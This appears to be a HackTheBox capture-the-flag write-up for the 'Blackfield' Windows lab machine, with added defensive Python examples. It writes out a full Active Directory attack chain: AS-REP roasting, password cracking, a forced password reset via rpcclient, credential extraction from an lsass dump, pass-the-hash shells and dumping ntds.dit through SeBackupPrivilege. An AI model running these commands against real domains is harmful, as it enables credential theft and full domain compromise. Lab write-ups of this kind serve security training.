
Blackfield Writeup [HTB]

Blackfield is a Windows machine from HackTheBox rated as difficult. It is an Active Directory machine where a Kerberoasting attack is performed, then some forensics is required in order to obtain a hash for initial access, and finally administrator access is obtained by abusing SeBackupPrivilege.

Enumeration

Running nmap:

nmap -sC -sV 10.10.10.192
Nmap scan report for BLACKFIELD.local (10.10.10.192)
Host is up (0.21s latency).
Not shown: 993 filtered ports
PORT     STATE SERVICE       VERSION
53/tcp   open  domain?
| fingerprint-strings:
|   DNSVersionBindReqTCP:
|     version
|_    bind
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2020-10-03 15:06:52Z)
135/tcp  open  msrpc         Microsoft Windows RPC
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)

As we can see, it is an Active Directory machine.

We will use smbclient to enumerate the SMB shares:

smbclient -L 10.10.10.192
        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        forensic        Disk      Forensic / Audit share.
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share
        profiles$       Disk      
        SYSVOL          Disk      Logon server share

Trying to list the contents of the forensic share we get access denied:

smbclient \\\\10.10.10.192\\forensic
smb: \> dir
NT_STATUS_ACCESS_DENIED listing \*

Connecting to profiles$ instead gives a huge list of directories which appear to be usernames:

smbclient \\\\10.10.10.192\\profiles$
smb: \> dir                                                                                                                
  .                                   D        0  Wed Jun  3 18:47:12 2020                                                 
  ..                                  D        0  Wed Jun  3 18:47:12 2020                                                 
  AAlleni                             D        0  Wed Jun  3 18:47:11 2020                                                 
  ABarteski                           D        0  Wed Jun  3 18:47:11 2020                                                 
  ABekesz                             D        0  Wed Jun  3 18:47:11 2020                                                 
  ABenzies                            D        0  Wed Jun  3 18:47:11 2020                                                 
  ABiemiller                          D        0  Wed Jun  3 18:47:11 2020                                                 
  AChampken                           D        0  Wed Jun  3 18:47:11 2020                                                 
  ACheretei                           D        0  Wed Jun  3 18:47:11 2020                                                 
  ACsonaki                            D        0  Wed Jun  3 18:47:11 2020                                                 
  AHigchens                           D        0  Wed Jun  3 18:47:11 2020                                                 
  AJaquemai                           D        0  Wed Jun  3 18:47:11 2020                                                 
  AKlado                              D        0  Wed Jun  3 18:47:11 2020                                                 
  AKoffenburger                       D        0  Wed Jun  3 18:47:11 2020                                                 
  AKollolli                           D        0  Wed Jun  3 18:47:11 2020                                                 
  AKruppe                             D        0  Wed Jun  3 18:47:11 2020                                                 
  AKubale                             D        0  Wed Jun  3 18:47:11 2020                                                 
  ALamerz                             D        0  Wed Jun  3 18:47:11 2020                                                 
  AMaceldon                           D        0  Wed Jun  3 18:47:11 2020                                                 
  AMasalunga                          D        0  Wed Jun  3 18:47:11 2020                                                 
  ANavay                              D        0  Wed Jun  3 18:47:11 2020                                                 
  ANesterova                          D        0  Wed Jun  3 18:47:11 2020                                                 
  ANeusse                             D        0  Wed Jun  3 18:47:11 2020                                                 
  AOkleshen                           D        0  Wed Jun  3 18:47:11 2020                                                 
  APustulka                           D        0  Wed Jun  3 18:47:11 2020                                                 
  ARotella                            D        0  Wed Jun  3 18:47:11 2020                                                 
  ASanwardeker                        D        0  Wed Jun  3 18:47:11 2020                                                 
  AShadaia                            D        0  Wed Jun  3 18:47:11 2020                                                 
  ASischo                             D        0  Wed Jun  3 18:47:11 2020                                                 
  ASpruce                             D        0  Wed Jun  3 18:47:11 2020                                                 
  ATakach                             D        0  Wed Jun  3 18:47:11 2020                                                 
  ATaueg                              D        0  Wed Jun  3 18:47:11 2020                                                 
  ATwardowski                         D        0  Wed Jun  3 18:47:11 2020                                                 
  audit2020                           D        0  Wed Jun  3 18:47:11 2020                                                 
  AWangenheim                         D        0  Wed Jun  3 18:47:11 2020
  ...

All the contents were copied to a user list and the junk was stripped with the following bash command:

awk '{print $1}' users.txt > text.txt

Exploitation

Now that we have a user list, we can use GetNPUsers.py from impacket, performing a Kerberoasting attack, to see whether we are able to get a TGT for any of them.

We already know the domain name (BLACKFIELD.local) from the nmap scan, and we will write the hash in john format so we can crack it later.

GetNPUsers.py BLACKFIELD.local/ -usersfile users.txt -format john -outputfile hashes.txt -dc-ip 10.10.10.192
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)                              
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)                              
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)                              
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)                              
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)                              
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)                              
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)                              
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)

After a while we check the hashes file and find a TGT for support:

cat hashes.txt
$krb5asrep$support@BLACKFIELD.LOCAL:971dafdacb7ef8b994fde97b1da3e9f7$37f9724cdd1f09f1055d9261954951229c7eb2f320512b823127431fbfc61c846c9743b554a9c5462ca86f542d78bdc265cdee806fd7fc33e05785d7b1d93d70d8835818e5eecf7923017ca53b5bbfc288c646c48f52b910286a67ed7d96ff64d4cf7a346d1ae919d7da2153d8fd1ee782e6f6750eb9497ad9eb6f7fe77fc97d924282d4533e7669b4b0f54765be92ad35570f41739821adae12d9ba225d6c6d14736f3b87328ac924809c3d446739232bc766aeea2366a44f40532eca09241c1672f0f11ac5641dbc87af954512553e856783bf62f377c3badce8e77aa56f0ff42fd40f99c68e17319065312ed35f5ed380c964
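Why did only support produce a hash while every other user returned KDC_ERR_C_PRINCIPAL_UNKNOWN or nothing? GetNPUsers.py can only obtain this material for accounts whose userAccountControl attribute has the DONT_REQ_PREAUTH bit set: such an account answers an AS-REQ without a pre-authentication timestamp, so the encrypted part of the AS-REP can be attacked offline. The following added example (written for this page, not code from the original writeup or from impacket) decodes that attribute so an administrator can find and fix such accounts. The account names and flag values are constructed sample data, not a real directory export.

```python
"""Added example: decode userAccountControl flags to find accounts that do
not require Kerberos pre-authentication. The sample accounts below are
constructed for the example, not taken from a real directory."""

# Bit values from the userAccountControl attribute (ADS_USER_FLAG_ENUM).
UAC_ACCOUNTDISABLE = 0x0002
UAC_NORMAL_ACCOUNT = 0x0200
UAC_DONT_EXPIRE_PASSWORD = 0x10000
UAC_DONT_REQ_PREAUTH = 0x400000

UAC_FLAG_NAMES = {
    UAC_ACCOUNTDISABLE: "ACCOUNTDISABLE",
    UAC_NORMAL_ACCOUNT: "NORMAL_ACCOUNT",
    UAC_DONT_EXPIRE_PASSWORD: "DONT_EXPIRE_PASSWORD",
    UAC_DONT_REQ_PREAUTH: "DONT_REQ_PREAUTH",
}


def decode_uac(value: int) -> list[str]:
    """Return the names of the known flags set in a userAccountControl value."""
    return [name for bit, name in UAC_FLAG_NAMES.items() if value & bit]


def asrep_roastable(accounts: dict[str, int]) -> list[str]:
    """Return enabled accounts whose userAccountControl has DONT_REQ_PREAUTH set.

    Disabled accounts are skipped: the KDC refuses them before issuing anything,
    so they are a hygiene finding rather than an exposure."""
    hits = []
    for name, uac in accounts.items():
        if uac & UAC_DONT_REQ_PREAUTH and not uac & UAC_ACCOUNTDISABLE:
            hits.append(name)
    return sorted(hits)


# Constructed sample export: sAMAccountName -> userAccountControl.
SAMPLE_ACCOUNTS = {
    "Administrator": 0x10200,  # NORMAL_ACCOUNT | DONT_EXPIRE_PASSWORD
    "audit2020": 0x200,        # NORMAL_ACCOUNT
    "support": 0x410200,       # NORMAL_ACCOUNT | DONT_EXPIRE_PASSWORD | DONT_REQ_PREAUTH
    "old_vendor": 0x400202,    # DONT_REQ_PREAUTH but ACCOUNTDISABLE: not exposed
}

if __name__ == "__main__":
    for name in asrep_roastable(SAMPLE_ACCOUNTS):
        print(f"{name}: {', '.join(decode_uac(SAMPLE_ACCOUNTS[name]))}")
```

In a real domain the same check is a single LDAP query, `(userAccountControl:1.2.840.113556.1.4.803:=4194304)`, and the fix is to clear the "Do not require Kerberos preauthentication" option on each account it returns; the function above is the offline equivalent for an exported attribute list.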

Now we can crack it with john:

john hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt
john --show hashes.txt
$krb5asrep$support@BLACKFIELD.LOCAL:#00^BlackKnight

With these credentials we can try rpcclient:

rpcclient 10.10.10.192 -U support
Enter WORKGROUP\support's password:
rpcclient $>

Enumerating users we find new ones such as audit2020:

rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[audit2020] rid:[0x44f]
user:[support] rid:[0x450]

We can also enumerate the privileges of the support account to see whether we can do something with them:

rpcclient $> enumprivs
found 35 privileges

SeCreateTokenPrivilege          0:2 (0x0:0x2)
SeAssignPrimaryTokenPrivilege           0:3 (0x0:0x3)
SeLockMemoryPrivilege           0:4 (0x0:0x4)
SeIncreaseQuotaPrivilege                0:5 (0x0:0x5)
SeMachineAccountPrivilege               0:6 (0x0:0x6)
SeTcbPrivilege          0:7 (0x0:0x7)
SeSecurityPrivilege             0:8 (0x0:0x8)
SeTakeOwnershipPrivilege                0:9 (0x0:0x9)
SeLoadDriverPrivilege           0:10 (0x0:0xa)
SeSystemProfilePrivilege                0:11 (0x0:0xb)
SeSystemtimePrivilege           0:12 (0x0:0xc)
SeProfileSingleProcessPrivilege                 0:13 (0x0:0xd)
SeIncreaseBasePriorityPrivilege                 0:14 (0x0:0xe)
SeCreatePagefilePrivilege               0:15 (0x0:0xf)
SeCreatePermanentPrivilege              0:16 (0x0:0x10)
SeBackupPrivilege               0:17 (0x0:0x11)
SeRestorePrivilege              0:18 (0x0:0x12)
SeShutdownPrivilege             0:19 (0x0:0x13)
SeDebugPrivilege                0:20 (0x0:0x14)
SeAuditPrivilege                0:21 (0x0:0x15)
SeSystemEnvironmentPrivilege            0:22 (0x0:0x16)
SeChangeNotifyPrivilege                 0:23 (0x0:0x17)
SeRemoteShutdownPrivilege               0:24 (0x0:0x18)
SeUndockPrivilege               0:25 (0x0:0x19)
SeSyncAgentPrivilege            0:26 (0x0:0x1a)
SeEnableDelegationPrivilege             0:27 (0x0:0x1b)
SeManageVolumePrivilege                 0:28 (0x0:0x1c)
SeImpersonatePrivilege          0:29 (0x0:0x1d)
SeCreateGlobalPrivilege                 0:30 (0x0:0x1e)
SeTrustedCredManAccessPrivilege                 0:31 (0x0:0x1f)
SeRelabelPrivilege              0:32 (0x0:0x20)
SeIncreaseWorkingSetPrivilege           0:33 (0x0:0x21)
SeTimeZonePrivilege             0:34 (0x0:0x22)
SeCreateSymbolicLinkPrivilege           0:35 (0x0:0x23)
SeDelegateSessionUserImpersonatePrivilege               0:36 (0x0:0x24)

As we can see there are lots of privileges. After investigating for a while I found that user passwords could be changed from rpcclient, so I decided to try with the audit2020 account and it was successful:

rpcclient $> setuserinfo2 audit2020 23 'N0xi0us'

Now with this account we can enumerate the contents of the forensic share:

smbclient -U audit2020 \\\\10.10.10.192\\forensic
Enter WORKGROUP\audit2020's password:
smb: \> dir
  .                                   D        0  Sun Feb 23 14:03:16 2020
  ..                                  D        0  Sun Feb 23 14:03:16 2020
  commands_output                     D        0  Sun Feb 23 19:14:37 2020
  memory_analysis                     D        0  Thu May 28 22:28:33 2020
  tools

There, inside memory_analysis, we find an interesting file belonging to Windows's Local Security Authority Service:

smb: \memory_analysis\> dir
  .                                   D        0  Thu May 28 22:28:33 2020
  ..                                  D        0  Thu May 28 22:28:33 2020
  conhost.zip                         A 37876530  Thu May 28 22:25:36 2020
  ctfmon.zip                          A 24962333  Thu May 28 22:25:45 2020
  dfsrs.zip                           A 23993305  Thu May 28 22:25:54 2020
  dllhost.zip                         A 18366396  Thu May 28 22:26:04 2020
  ismserv.zip                         A  8810157  Thu May 28 22:26:13 2020
  lsass.zip                           A 41936098  Thu May 28 22:25:08 2020
  mmc.zip                             A 64288607  Thu May 28 22:25:25 2020
  RuntimeBroker.zip                   A 13332174  Thu May 28 22:26:24 2020
  ServerManager.zip                   A 131983313  Thu May 28 22:26:49 2020
  sihost.zip                          A 33141744  Thu May 28 22:27:00 2020
  smartscreen.zip                     A 33756344  Thu May 28 22:27:11 2020
  svchost.zip                         A 14408833  Thu May 28 22:27:19 2020
  taskhostw.zip                       A 34631412  Thu May 28 22:27:30 2020
  winlogon.zip                        A 14255089  Thu May 28 22:27:38 2020
  wlms.zip                            A  4067425  Thu May 28 22:27:44 2020
  WmiPrvSE.zip                        A 18303252  Thu May 28 22:27:53 2020

Trying to download it we get an error, so we can mount the directory on our machine instead:

smb: \memory_analysis\> get lsass.zip
Error opening local file lsass.zip
mount -t cifs //10.10.10.192/forensic/memory_analysis /mnt -o user=audit2020
🔐 Password for audit2020@//10.10.10.192/forensic/memory_analysis:  *******

After unzipping it, we find it contains a memory dump file:

ls -l lsass.DMP
-rw-r--r-- 1 root root 143044222 Feb 23  2020 lsass.DMP

So according to this article we can use mimikatz to extract password hashes.

As we are on Linux we can use pypykatz, an alternative to mimikatz written in Python.

We just need to adapt the mimikatz syntax a bit and run it; as the output is huge I will only show the relevant part:

pypykatz lsa minidump lsass.DMP
Username: svc_backup
Domain: BLACKFIELD
LM: NA
NT: 9658d1d1dcd9250115e2205d9f48400d

With this hash we can use the pass-the-hash technique and obtain a shell with evil-winrm:

evil-winrm -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d -i 10.10.10.192
Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\svc_backup\Documents> whoami
blackfield\svc_backup

Privilege Escalation

Checking this account's privileges we see that SeBackupPrivilege is enabled:

*Evil-WinRM* PS C:\Users\svc_backup\Documents> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
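When reviewing a service account like svc_backup, the question is which of the listed privileges matter. The following added example (written for this page, not code from the original writeup) parses the `whoami /priv` table and reports the privileges that let a token bypass file and process security; SeBackupPrivilege and SeRestorePrivilege, both enabled here, are in that set. The sample text is the output shown above plus one constructed row for a privilege that is present but disabled, to show that state is reported rather than used as a filter.

```python
"""Added example: triage `whoami /priv` output for privileges that bypass
object security. The sample table is the page's output plus one constructed
row (SeDebugPrivilege, Disabled)."""

# Privileges that routinely lead to local or domain compromise, with the reason.
HIGH_IMPACT = {
    "SeBackupPrivilege": "read any file regardless of ACL (registry hives, ntds.dit)",
    "SeRestorePrivilege": "write any file regardless of ACL",
    "SeDebugPrivilege": "open any process, including lsass",
    "SeImpersonatePrivilege": "impersonate tokens of connecting clients",
    "SeTakeOwnershipPrivilege": "take ownership of any securable object",
    "SeLoadDriverPrivilege": "load kernel drivers",
}

SAMPLE_WHOAMI_PRIV = """
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeDebugPrivilege              Debug programs                 Disabled
"""


def parse_whoami_priv(text: str) -> dict[str, str]:
    """Map privilege name -> State for every Se* row; header and rule lines are skipped."""
    privs = {}
    for line in text.splitlines():
        parts = line.split()
        if len(parts) >= 3 and parts[0].startswith("Se") and parts[-1] in ("Enabled", "Disabled"):
            privs[parts[0]] = parts[-1]
    return privs


def triage(text: str) -> list[tuple[str, str, str]]:
    """Return (privilege, state, reason) for each high-impact privilege in the token.

    A Disabled privilege is still reported: it is present in the token and the
    holder can enable it, so only its absence removes the risk."""
    privs = parse_whoami_priv(text)
    return [(name, privs[name], HIGH_IMPACT[name]) for name in HIGH_IMPACT if name in privs]


if __name__ == "__main__":
    for name, state, reason in triage(SAMPLE_WHOAMI_PRIV):
        print(f"{name:26} {state:9} {reason}")
```

For a domain controller the same finding can be made from the other direction: SeBackupPrivilege is granted to the Backup Operators group by default, so auditing that group's membership catches accounts like svc_backup before anyone runs `whoami /priv` on them.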

With this privilege we have access to every file on the system; a more detailed explanation of this privilege can be found in this set of slides.

We can get the admin hash by obtaining the SYSTEM registry hive and ntds.dit (the database that stores the AD information) and then running impacket's secretsdump on them.

The SYSTEM file can be downloaded easily:

*Evil-WinRM* PS C:\Users\svc_backup\Documents> download system.hive
Info: Downloading C:\Users\svc_backup\Documents\system.hive to system.hive


Info: Download successful!

To obtain NTDS.dit we first need to use diskshadow to create and expose a shadow copy; to do that we will use the following script:

*Evil-WinRM* PS C:\tmp> upload script.txt                                                                                  
Info: Uploading script.txt to C:\tmp\script.txt                                                                            


Data: 108 bytes of 108 bytes copied

Info: Upload successful!

*Evil-WinRM* PS C:\tmp> diskshadow /s script.txt
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer:  DC01,  10/3/2020 9:33:44 AM

-> set context persistent
-> add volume c: alias mydrive
-> create
Alias mydrive for shadow ID {69711bad-ca22-4576-94eb-daa71cc185be} set as environment variable.
Alias VSS_SHADOW_SET for shadow set ID {af8518f9-cee1-49d3-8b7e-553757aa0761} set as environment variable.

Querying all shadow copies with the shadow copy set ID {af8518f9-cee1-49d3-8b7e-553757aa0761}

        * Shadow copy ID = {69711bad-ca22-4576-94eb-daa71cc185be}               %mydrive%
                - Shadow copy set: {af8518f9-cee1-49d3-8b7e-553757aa0761}       %VSS_SHADOW_SET%
                - Original count of shadow copies = 1
                - Original volume name: \\?\Volume{351b4712-0000-0000-0000-602200000000}\ [C:\]
                - Creation time: 10/3/2020 9:34:20 AM
                - Shadow copy device name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
                - Originating machine: DC01.BLACKFIELD.local
                - Service machine: DC01.BLACKFIELD.local
                - Not exposed
                - Provider ID: {b5946137-7b9f-4925-af80-51abd60b20d5}
                - Attributes:  No_Auto_Release Persistent Differential

Number of shadow copies listed: 1
-> expose %mydrive% z:
-> %mydrive% = {69711bad-ca22-4576-94eb-daa71cc185be}
The shadow copy was successfully exposed as z:\.

Now we need to upload and import two DLLs that use the backup API the way a backup program would:

*Evil-WinRM* PS C:\tmp> upload SeBackupPrivilegeCmdLets.dll
*Evil-WinRM* PS C:\tmp> upload SeBackupPrivilegeUtils.dll
*Evil-WinRM* PS C:\tmp> Import-Module ./SeBackupPrivilegeCmdLets.dll
*Evil-WinRM* PS C:\tmp> Import-Module ./SeBackupPrivilegeUtils.dll

Then we copy ntds.dit from the shadow copy to our temp directory and download it:

*Evil-WinRM* PS C:\tmp> Copy-FileSebackupPrivilege z:\Windows\NTDS\ntds.dit C:\tmp\ntds.dit
*Evil-WinRM* PS C:\tmp> download ntds.dit

Finally we use secretsdump to obtain the admin hash:

secretsdump.py  -system system -ntds ntds.dit LOCAL
Impacket v0.9.22.dev1+20200728.230151.48a3124c - Copyright 2020 SecureAuth Corporation

[*] Target system bootKey: 0x73d83e56de8961ca9f243e1a49638393
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 35640a3fd5111b93cc50e3b4e255ff8c
[*] Reading and decrypting hashes from ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:184fb5e5178480be64824d4cd53b99ee:::
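The `domain\uid:rid:lmhash:nthash` lines that secretsdump prints are the same material an administrator audits after a legitimate offline extraction of ntds.dit: accounts with an empty password, accounts that still store an LM hash, and groups of accounts sharing one NT hash (the same password reused). The following added example (written for this page, not code from the original writeup or from impacket) parses that format and produces those three findings. The Administrator line is the one shown above; the remaining lines are constructed sample data with made-up hash values.

```python
"""Added example: parse secretsdump hash lines and report empty passwords,
stored LM hashes and NT-hash reuse. All lines except the Administrator one
are constructed sample data with invented hashes."""

from collections import defaultdict
from dataclasses import dataclass

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # LM hash of an empty/absent password
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash of an empty password


@dataclass
class SecretsEntry:
    account: str
    rid: int
    lm: str
    nt: str


def parse_secretsdump(lines) -> list[SecretsEntry]:
    """Parse account:rid:lm:nt::: lines; status lines and malformed rows are skipped."""
    entries = []
    for line in lines:
        line = line.strip()
        if not line or line.startswith("["):
            continue
        parts = line.split(":")
        if len(parts) < 4:
            continue
        account, rid, lm, nt = parts[0], parts[1], parts[2].lower(), parts[3].lower()
        if not rid.isdigit() or len(lm) != 32 or len(nt) != 32:
            continue
        entries.append(SecretsEntry(account, int(rid), lm, nt))
    return entries


def audit(entries: list[SecretsEntry]) -> dict:
    """Return the three findings as lists of account names."""
    empty_pw = [e.account for e in entries if e.nt == EMPTY_NT]
    lm_stored = [e.account for e in entries if e.lm != EMPTY_LM]
    by_nt = defaultdict(list)
    for e in entries:
        if e.nt != EMPTY_NT:           # empty passwords are reported separately
            by_nt[e.nt].append(e.account)
    reuse = sorted(sorted(accs) for accs in by_nt.values() if len(accs) > 1)
    return {"empty_password": empty_pw, "lm_hash_stored": lm_stored, "shared_nt_hash": reuse}


# The first hash line is from the writeup; the others are constructed.
SAMPLE_OUTPUT = [
    "[*] Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash)",
    "Administrator:500:aad3b435b51404eeaad3b435b51404ee:184fb5e5178480be64824d4cd53b99ee:::",
    "Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::",
    "svc_legacy:1107:00112233445566778899aabbccddeeff:0123456789abcdef0123456789abcdef:::",
    "jdoe:1108:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::",
]

if __name__ == "__main__":
    for finding, accounts in audit(parse_secretsdump(SAMPLE_OUTPUT)).items():
        print(f"{finding}: {accounts}")
```

A stored LM hash means the account's password was set while LM hashing was still permitted, which also bounds its length at 14 characters; the reuse finding is the one that turns a single cracked or stolen hash into several accounts, which is exactly the lateral movement the writeup demonstrates with pass-the-hash.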

We can then obtain an admin shell using pass-the-hash again:

evil-winrm -i 10.10.10.192 -u Administrator -H 184fb5e5178480be64824d4cd53b99ee
Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
blackfield\administrator

This post is licensed under CC BY 4.0 by the author.